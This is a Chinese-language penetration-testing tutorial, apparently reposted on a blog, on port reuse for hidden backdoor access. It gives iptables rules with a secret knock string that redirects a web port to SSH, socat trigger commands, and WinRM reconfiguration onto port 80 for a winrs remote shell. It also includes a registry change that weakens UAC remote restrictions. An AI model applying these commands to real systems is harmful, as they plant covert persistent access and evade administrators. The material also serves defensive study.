出品|MS08067實驗室(www.ms08067.com)
本文作者:Spark(Ms08067內網安全小組成員)
定義:埠復用是指不同的應用程式使用相同埠進行通訊,
場景:內網滲透中,搭建隧道時,服務器僅允許指定的埠對外開放,利用埠復用可以將3389或22等埠轉發到如80埠上,以便外部連接,
示意圖:
功能:
- 埠復用可以更好地隱蔽攻擊行為,提高生存幾率,
- 埠復用有時也用作通道后門,
特點:
- 埠復用在系統已開放的埠上進行通訊,只對輸入的資訊進行字符匹配,不對網路資料進行任何攔截、復制類操作,所以對網路資料的傳輸性能幾乎沒有影響,
一、Linux埠復用
1.概述
??使用iptables實作埠復用,使用socat進行連接,
??使用該方法開啟的埠復用為有限的埠復用,復用后埠正常業務會受影響,僅用于后門留存,或者臨時使用,不建議長期使用,
2.原理
(1) iptables
??iptables是linux下的防火墻管理工具,
- 真正實作防火墻功能的是netfilter,它是linux內核中實作包過濾的核心,
- 免費,
- 可實作封包過濾、封包重定向和網路地址轉換(NAT)等功能,
(2) 資料通過防火墻流程
(3) 鏈
??鏈是一些按順序排列的規則的串列,
- PREROUTING鏈——對資料包作路由選擇前應用此鏈中的規則(所有的資料包進來的時侯都先由這個鏈處理)
- INPUT鏈——進來的資料包應用此規則鏈中的策略
- OUTPUT鏈——外出的資料包應用此規則鏈中的策略
- FORWARD鏈——轉發資料包時應用此規則鏈中的策略
- POSTROUTING鏈——對資料包作路由選擇后應用此鏈中的規則(所有的資料包出來的時侯都先由這個鏈處理)
(4) 表
??表由一組預先定義的鏈組成,
- filter表——用于存放所有與防火墻相關操作的默認表,通常用于過濾資料包,
- nat表——用于網路地址轉換
- mangle表——用于處理資料包
- raw表——用于配置資料包,raw 中的資料包不會被系統跟蹤,
(5) 鏈和表的關系及順序
- PREROUTING: raw -> mangle -> nat
- INPUT: mangle -> filter
- FORWARD: mangle -> filter
- OUTPUT: raw -> mangle -> nat -> filter
- POSTROUTING: mangle -> nat
(6) 表和鏈的關系
??實際使用中是從表作為操作入口:
- raw 表:PREROUTING,OUTPUT
- mangle表:PREROUTING,INPUT,FORWARD,OUTPUT,POSTROUTING
- nat 表:PREROUTING,OUTPUT,POSTROUTING
- filter 表:INPUT,FORWARD,OUTPUT
(7) 添加規則
iptables ‐t 表名 <‐A/I/D/R> 規則鏈名 [規則號] <‐i/o 網卡名> ‐p 協議名 <‐s 源ip、源子網> ‐‐sport 源埠 <‐d 目標ip/目標子網> ‐‐dport 目標埠 ‐j 動作
(8) socat
??Socat是linux下的一個多功能的網路工具,名字來由是socket cat,其功能與netcat類似,可以看做是netcat的加強版,
3.指令速查
(1) 配置埠復用及開關規則
- 目標主機上創建新轉發鏈
- 設定復用規則(設定轉發規則)
- 設定開關規則(接受約定字符后規則生效/失效)
- 約定字符盡量復雜
# 新建埠復用鏈
iptables -t nat -N LETMEIN
# 埠復用規則
iptables -t nat -A LETMEIN -p tcp -j REDIRECT --to-port 22
# 開啟埠復用開關
iptables -A INPUT -p tcp -m string --string 'threathuntercoming' --algo bm -m recent --set --name letmein --rsource -j ACCEPT
# 關閉埠復用開關
iptables -A INPUT -p tcp -m string --string 'threathunterleaving' --algo bm -m recent --name letmein --remove -j ACCEPT
# 開啟埠復用
iptables -t nat -A PREROUTING -p tcp --dport 8000 --syn -m recent --rcheck --seconds 3600 --name letmein --rsource -j LETMEIN
(2) 使用socat連接
??使用socat發送約定口令至目標主機打開埠復用開關
echo threathuntercoming | socat ‐ tcp:192.168.245.135:8000
??使用完畢后,發送約定關閉口令至目標主機目標埠關閉埠復用
echo threathunterleaving | socat ‐ tcp:192.168.245.135:8000
4.實驗
- Target:Ubuntu 16.04 x64
- IP:192.168.245.135
- 開啟8000埠的web服務
- 開啟22埠
??配置埠復用:
- Attacker:Kali 2020 x64
- IP:192.168.245.130
??使用socat連接:
??此時ssh可以通過8000訪問,但是8000埠的正常web業務受到影響:
??使用socat斷開連接,ssh無法再連接,但是8000埠回復正常:
5.參考鏈接
- https://www.jianshu.com/p/12a24a95fe2c
- https://www.freebuf.com/articles/network/137683.html
二、Windows埠復用
1.概述
??使用HTTP.sys中的Net.tcp Port Sharing服務,配合WinRM實作埠復用,
- 優點:HTTP.sys為windows原生機制,WinRM為windows自帶功能,動作較小,不易觸發主動防御,
- 需要管理員權限,
2.原理
(1) HTTP.sys
??HTTP.sys是Microsoft Windows處理HTTP請求的內核驅動程式,
- 為了優化IIS服務器性能
- 從IIS6.0引入(即Windows Server 2003及以上版本)
- IIS服務行程依賴HTTP.sys
??HTTP.sys監聽HTTP流量,然后根據URL注冊的情況去分發,以實作多個行程在同一個埠監聽HTTP流量,微軟公開了HTTP Server API庫,Httpcfg、Netsh等都是基于它的,
??整個程序描述如下:
??Step 1.注冊:IIS或其他應用使用HTTP Server API時,需要先在HTTP.sys上面注冊url prefix,以監聽請求路徑,
??Step 2.路由:HTTP.sys獲取到request請求,并分發這個請求給注冊當前url對應的應用,
(2) Net.tcp Port Sharing
??Net.tcp Port Sharing服務是WCF(Windows Communication Foundation,微軟的一個框架)中的一個新系統組件,這個服務會開啟Net.tcp埠共享功能以達到在用戶的不同行程之間實作埠共享,這個機制的最終是在HTTP.sys中實作的,目前將許多不同HTTP應用程式的流量復用到單個TCP埠上的HTTP.sys模型已經成為windows平臺上的標準配置,
??在以前的web應用中,一個web應用系結一個埠,若有其他應用則需要系結其他的埠才能實作監聽,如下圖所示,Web Application 1系結了80埠后,Web Application 2再去系結80埠會出錯,
??現在使用微軟提供的NET.tcp Port Sharing服務,只要遵循相關的開發介面規則,就可以實作不同的應用共享相同的web服務器埠,如下圖中Web Application 1和Web Application 2同時系結在80埠,
(3) WinRM
??WinRM全稱是Windows Remote Management,是微軟服務器硬體管理功能的一部分,能夠對本地或遠程的服務器進行管理,WinRM服務能夠讓管理員遠程登錄windows作業系統,獲得一個類似telnet的互動式命令列shell,而底層通訊協議使用的正是HTTP,
??事實上,WinRM已經在HTTP.sys上注冊了名為wsman的url前綴,默認監聽埠5985,因此,在安裝了IIS的邊界windows服務器上,開啟WinRM服務后修改默認listener埠為80或新增一個80埠的listener即可實作埠復用,可以直接通過80埠登錄windows服務器,
3.指令速查
??查詢當前注冊url前綴:
netsh http show servicestate
(1) 開啟winrm服務
??Windows 2012及以上:winrm默認啟動并監聽了5985埠,
??Windows 2008:需要手動啟動winrm,
winrm quickconfig ‐q
(2) 增加80埠復用
winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"}
(3) 更改winrm為80埠
- 默認5985埠開啟,不需要更改埠,
- 默認5985埠不開啟,則更改winrm為80埠,否則會因埠改變而引起管理員關注,
winrm set winrm/config/Listener?Address=*+Transport=HTTP @{Port="80"}
(4) 攻擊機也需要啟動winrm并設定信任連接
# 啟動winrm
winrm quickconfig ‐q
# 設定信任主機地址
winrm set winrm/config/Client @{TrustedHosts="*"}
(5) 連接使用winrs命令介面連接遠程winrm服務執行命令,并回傳結果
??winrs,Windows Remote Shell,windows遠程shell,是winrm的一個組件,
winrs ‐r:http://www.aabbcc.com ‐u:administrator ‐p:Password [命令]
4.實驗
- Target:Windows Server 2008 R2 x64
- IP:192.168.245.133
??開啟IIS服務,
??先看一下當前注冊的url前綴:
??啟動winrm:
??再看一下注冊的url前綴,發現winrm已注冊:
??看一下埠情況:
??增加80埠復用:
??更改winrm為80埠:
??再看一下埠情況,發現5985埠已關閉:
- Attacker:Windows Server 2008 R2 x64
- IP:192.168.245.134
??啟動winrm并設定信任主機地址:
??使用winrs遠程執行命令:
??執行cmd命令可獲取互動式shell:
??此時IIS的正常服務并未受到影響:
5.提升權限(未親測)
??WinRM服務也是受UAC影響的,所以本地管理員用戶組里面只有administrator可以登錄,其他管理員用戶是沒法遠程登錄WinRM的,要允許本地管理員組的其他用戶登錄WinRM,需要修改注冊表設定,
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
??修改后,普通管理員登錄后也是高權限,
6.Hash登錄(未親測)
??系統自帶的winrs命令登錄時需要使用明文賬號密碼,那很多場景下尤其是windows 2012以后,經常只能抓取到本地用戶的hash,無法輕易獲得明文密碼,因此需要實作一款支持使用NTLM hash登錄的客戶端,使用python來實作不難,
7.參考鏈接
- https://www.freebuf.com/articles/web/142628.html
- https://paper.seebug.org/1004/
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/254707.html
標籤:其他
上一篇:鉆研好esp-01能找到作業嗎?
下一篇:什么是RESTful API